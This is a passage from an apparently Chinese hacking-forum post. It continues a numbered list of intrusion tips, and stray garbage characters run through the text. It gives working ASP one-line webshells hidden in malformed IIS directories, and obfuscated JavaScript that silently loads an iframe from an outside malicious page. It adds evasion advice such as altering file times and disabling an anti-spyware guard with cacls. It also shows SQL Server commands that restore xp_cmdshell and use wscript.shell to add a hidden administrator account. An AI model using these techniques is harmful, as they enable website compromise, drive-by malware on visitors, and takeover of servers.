执行后可以用AT命令查看新加的任务& {" C/ N8 f& i5 |
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。6 I% j0 d+ @9 B
) M" T" P; j8 T5 F% B# l- g& F) x
53、隐藏ASP后门的两种方法/ g$ h* a: F9 q8 x
1、建立非标准目录:mkdir images..\. u  U: i, G8 h0 _$ U* M0 D; |
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
. Q9 N) D% `2 L' u- U通过web访问ASP木马:http://ip/images../news.asp?action=login# C5 w) S2 Q) b6 n; |9 V
如何删除非标准目录:rmdir images..\ /s
& Y) y. o  {& S: Q# S2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:9 @+ Q: e# L, h- {
mkdir programme.asp
3 m* O3 ^4 P1 ^8 x+ v) \  Z0 ^5 H新建1.txt文件内容:<!--#include file=”12.jpg”-->
# n' q+ `7 o/ N; {4 z新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件* [& S# s6 ?' x( o# u
attrib +H +S programme.asp6 `/ X. n/ C4 o" [" C" z! D5 R
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: q) O& \$ _. u  `# K
& K: p+ `; @. a
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
: q, A* b4 n; y" e# r7 n, o- d6 n然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。; H0 h  W/ b/ d  y8 O. N

$ u) Y1 x7 s  e55、JS隐蔽挂马5 c5 r7 P9 {: J+ \& [% O+ t# Z
1.# ^2 C4 {/ {2 n8 Q4 q
var tr4c3="<iframe src=ht";
- w) h/ q5 W1 a' Btr4c3 = tr4c3+"tp:/";; S7 j' E8 I9 m9 D
tr4c3 = tr4c3+"/ww";" i9 s  V. _( Q" d, G- A% Z( i( ]
tr4c3 = tr4c3+"w.tr4";3 n4 j) n  l( J' L) I
tr4c3 = tr4c3+"c3.com/inc/m";
3 A* K2 O7 J/ y2 i/ Ftr4c3 = tr4c3+"m.htm style="display:none"></i";
3 a9 `5 D# T7 D% h# Str4c3 =tr4c3+"frame>'";
9 d0 u1 T) r! s1 ndocument.write(tr4c3);
, M& b( [+ F$ x+ D% I9 P' m避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
2 S: F9 |+ P: r) g: J9 h
: F% A8 J( ?! v" x) W2 w  f2.1 n8 L: u5 t9 O0 G8 k% ]
转换进制,然后用EVAL执行。如
2 H  @: O# A0 ]0 qeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");# G9 S8 ~; h% [  k  F1 P1 R
不过这个有点显眼。
( S, L# ~, q/ ~9 W) @" q3.
4 Z# V7 j7 n) R1 h9 ~0 c& ^' L) odocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
( _/ s% x9 c! Y最后一点,别忘了把文件的时间也修改下。
. ~2 [; ^" \" _, }# ^( E0 K5 |: i
56.3389终端入侵常用DOS命令
4 b1 O5 _. E) Q8 q0 }/ ltaskkill taskkill /PID 1248 /t
) v6 E9 t" G1 u  U# G# R( M9 B' B. K, m( O  ^4 [4 j
tasklist 查进程
7 R% S* P8 ^! |/ [* Q8 _5 g" ?# i. v
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* r' W1 Z& n, H- ]
iisreset /reboot; s2 Y5 d# m& H6 N  S
tsshutdn /reboot /delay:1    重起服务器
2 A/ \+ r# P$ C+ w0 Q/ U9 {4 `% Q! v3 ^( X, Q7 l0 g9 u
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 D" _! T2 N" E3 }

. n, o/ }/ T6 N/ D; Cquery user 查看当前终端用户在线情况. Q4 x$ q' r& D& |1 B' b* E; J
/ b* l7 J- p$ z+ i8 {, @) m
要显示有关所有会话使用的进程的信息,请键入:query process *
8 P, F6 @, r6 W4 x, Y! g9 p
2 L7 ?0 D* B' [3 P* d$ r要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
7 j; t* p4 E/ \, U8 d: U* n. a$ n! ]5 s6 u/ S& Z9 h( x. L) N
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
  d" A+ j% w) f1 I- l! h
( ?9 k* w1 r, K, @. N要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 Z+ X6 H0 ^+ h/ g  e4 V: C$ I: H4 s( J8 @. F+ T( o
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启3 U* G0 L, ^3 k' x% O

* E/ P7 V6 }. C2 c# P- ^命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
( [+ q, l5 ?( A! n+ l* I& a
: k: k5 W2 u7 o  [( o+ P" E' D; s& L命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
8 ~/ o& x2 n7 ?1 I+ O) u7 D& _7 w9 d
/ R. y/ G+ c( f8 l命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机; D) U1 b/ C# y; [8 o: R

" t1 H0 ~# Z8 c! D$ n) z56、在地址栏或按Ctrl+O,输入:( }1 _, ]; x0 Z9 d! l7 v
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;' E: t2 L- w  ?% w: j9 h3 S7 q
( ^* p) F: q; ]4 c
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
) ^; C, M: p  H1 ~; V; l; J- e9 B( ~) S, a7 y! M. t* g& m
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,. ^' N6 u/ H( d. U+ i' x; j
用net localgroup administrators是可以看到管理组下,加了$的用户的。& M- F8 t5 p' C5 e& ~$ m
# C" W9 j8 v" [. x8 V1 M$ ?8 K
58、 sa弱口令相关命令
4 r" D+ u6 U% }* y
/ t. E' b6 i7 ^一.更改sa口令方法:
  P6 X; \5 F' n* }+ ]1 ?: \/ S/ P用sql综合利用工具连接后,执行命令:
$ E$ V0 h! x9 m+ g$ bexec sp_password NULL,'20001001','sa', c: R- J( Z% j  a. @' W
(提示:慎用!)
9 |3 e) c4 y% O/ h3 T5 w7 g$ c6 X+ h7 Z2 i. F  ?% U
二.简单修补sa弱口令.
" @3 s4 G6 @- ^# y8 m# x" G5 @7 Q' h: z" q  u+ ]' C
方法1:查询分离器连接后执行:
1 Z8 C9 o$ K+ Y' }8 H9 l, u* V+ h2 ^if exists (select * from
6 ^1 q) ~6 Y$ [2 `4 u) xdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and6 q0 i! T! y7 Z; m) |
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)" B1 A8 ?3 Z5 ?9 B1 D  ?
# R; ]# D7 E+ T6 Y
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
+ K2 E! r2 f  _3 v( M1 Q5 o3 E! ?" T! w' O4 K6 Z5 _
GO( d; D' b; x9 |- p& Q

+ b6 i5 ]: D" _4 S9 s然后按F5键命令执行完毕
9 ^) t( G8 _# v& T# F3 f3 i$ l, V6 M0 R' C& [# N/ H+ k
方法2:查询分离器连接后! o- P4 F: J& \& A; _: R
第一步执行:use master
( _  i5 ?2 w2 ]- M( R$ j7 p第二步执行:sp_dropextendedproc 'xp_cmdshell': M/ ?$ N4 Q* M9 m! _! ^
然后按F5键命令执行完毕
% x2 `% L* H/ |. t- H( X' b, A" p& U* z, g1 ?9 y+ G/ `

, S# x' `  c" |: D% ~三.常见情况恢复执行xp_cmdshell.
/ e7 p# x+ h; B6 ~
9 T. b0 D2 U* h  i7 e7 r
% G! E" P$ |! e! e/ f1 未能找到存储过程'master..xpcmdshell'.
+ d. o0 `/ V3 V7 U4 p   恢复方法:查询分离器连接后,* [' P1 t8 Q* E
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* i# h/ J9 R0 p/ u第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'8 s6 }: P' U! J2 |0 Y3 R
然后按F5键命令执行完毕: W+ A' V, C. r! t6 v4 k$ S

/ O5 X+ p0 F9 r0 P/ r+ k" W+ h2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)% t$ J% ]( J! s' U/ @, w* T6 a3 a
恢复方法:查询分离器连接后,# H( X$ Z3 R7 M# z6 ~" x" t
第一步执行:sp_dropextendedproc "xp_cmdshell"2 T; }: ?1 C$ P
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
; D. g2 I/ b* d0 i/ Z然后按F5键命令执行完毕. n0 B+ l- H0 }+ g- X' |* Y
7 K, V+ z1 S! |# o2 {1 W* _2 Z) s
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
, B- K' ^3 G& o恢复方法:查询分离器连接后,, _0 o' M' j+ W4 A3 {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'' O/ s) D# a; O4 L+ w
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           # F" l/ l% F# W1 x
然后按F5键命令执行完毕
, Y" v& ?/ q# Y1 f
- |7 w6 Y. M  l2 q% v( }四.终极方法.
& a! G0 o+ s5 T8 }7 r4 t如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:7 N0 K5 T# a+ m- Z" r2 b) L  P4 ^
查询分离器连接后,
' h2 d( ]! Q8 f# H. A9 v2000servser系统:
' x' ?1 Y6 K* F8 ?/ J' i8 t: Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'. x# G7 d) Y2 Y2 W& u# G4 x
; Q+ Y1 O5 H+ V% J/ _8 @! l* ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 k: Z) @) R3 I; D% f; ]
- q$ T7 }; h3 a' zxp或2003server系统:/ Q5 g# `; {( e

0 g( \* |6 p4 e2 Adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ |, b  D: K1 m" p, e

& O$ o( U9 \1 g' Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- y! @1 B: |; q1 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表